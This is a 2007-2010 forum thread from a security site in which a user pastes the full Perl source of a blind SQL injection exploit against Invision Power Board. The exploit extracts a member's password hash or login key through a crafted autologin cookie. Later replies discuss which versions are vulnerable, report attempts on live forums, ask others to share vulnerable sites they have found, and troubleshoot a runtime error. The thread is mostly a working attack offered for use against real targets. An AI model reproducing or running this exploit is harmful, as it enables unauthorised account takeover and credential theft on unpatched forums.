 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
IPB 2-2.16 exploit |
 |
 Posted: Sat Dec 08, 2007 4:42 am |
 |
|
| cubanelit3 |
| Beginner |
 |
|
| Joined: Dec 08, 2007 |
| Posts: 1 |
|
|
|
 |
|
 |
|
Alright heres the scenario, I have an exploit for Perl, that is made for any IPB forum version 2-2.1.6. Problem is that every time i find a web forum in that limit, they are not vulnerable? any help on this? here is the exploit for those who would like to try it themselves.
| Code: |
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr(42);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75" . "%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0" . "%E0%F1%21%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2, $pass_hash3, $nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
} |
thanks for your time |
|
|
|
|
|
|
|
|
| Posted: Sat Dec 08, 2007 5:55 am |
|
|
| Sm0ke |
| Moderator |
 |
|
| Joined: Nov 25, 2006 |
| Posts: 141 |
| Location: Finland |
|
|
|
|
|
|
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
not going to work on 2.1x versions |
|
|
|
|
| Posted: Sat Dec 08, 2007 9:02 am |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Sm0ke wrote: | ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
not going to work on 2.1x versions |
Yep.I use this xploit very very long time ago on 1.3.1 final.Working perfekt. |
|
|
|
|
| Posted: Thu Sep 24, 2009 9:36 pm |
|
|
| tox1c |
| Active user |
|
|
| Joined: Sep 22, 2009 |
| Posts: 41 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Mon Sep 28, 2009 1:33 pm |
|
|
| Mooka91 |
| Advanced user |
|
|
| Joined: Aug 15, 2009 |
| Posts: 73 |
|
|
|
|
|
|
|
| Yes, As long as you are using the right version of forum and the forums aren't patched. Good luck. |
|
|
|
|
| Posted: Fri Oct 23, 2009 6:40 am |
|
|
| AgentJ9 |
| Active user |
|
|
| Joined: Sep 07, 2008 |
| Posts: 26 |
|
|
|
|
|
|
|
| Im trying it now, Anyone else feel free to post comments OR Vulnerable Sites youve found. |
|
|
|
|
| Posted: Sun Oct 25, 2009 2:43 pm |
|
|
| CrayVr |
| Beginner |
|
|
| Joined: Oct 25, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
I tried but when the exploit tried to find the user pass, it always said: "Failed"
Unfortunately this exploit does not work... |
|
|
|
|
| Posted: Mon Oct 26, 2009 12:19 am |
|
|
| AgentJ9 |
| Active user |
|
|
| Joined: Sep 07, 2008 |
| Posts: 26 |
|
|
|
|
|
|
|
| Sm0ke wrote: | ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
not going to work on 2.1x versions |
^^ You must use these versions, its working for me. |
|
|
|
|
| Posted: Mon Oct 26, 2009 4:10 pm |
|
|
| CrayVr |
| Beginner |
|
|
| Joined: Oct 25, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
| AgentJ9 wrote: | | Sm0ke wrote: | ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
not going to work on 2.1x versions |
^^ You must use these versions, its working for me. |
Yes i tested it already it didnt work. Are you 100 percent sure it works?? I'll try again today. |
|
|
|
|
| Posted: Fri Oct 30, 2009 4:43 am |
|
|
| AgentJ9 |
| Active user |
|
|
| Joined: Sep 07, 2008 |
| Posts: 26 |
|
|
|
|
|
|
|
| Unfortunately, i cant promise much, but heres a ipb exploit tut in perl, But its old, & looks like it maybe patched, but youre welcome to try it. I havent tried this yet, but heres the link: [url]http://www. |
|
|
|
|
| Posted: Tue Jan 12, 2010 9:56 pm |
|
|
| JohnR |
| Beginner |
|
|
| Joined: Jan 12, 2010 |
| Posts: 2 |
|
|
|
|
|
|
|
i got this
| Code: |
[~] SEARCHING PASSWORD ... [-]Can't use an undefined value as a symbol reference at ./test3.pl line 134.
|
anyone a idea ? |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 222
Members: 0
Total: 222
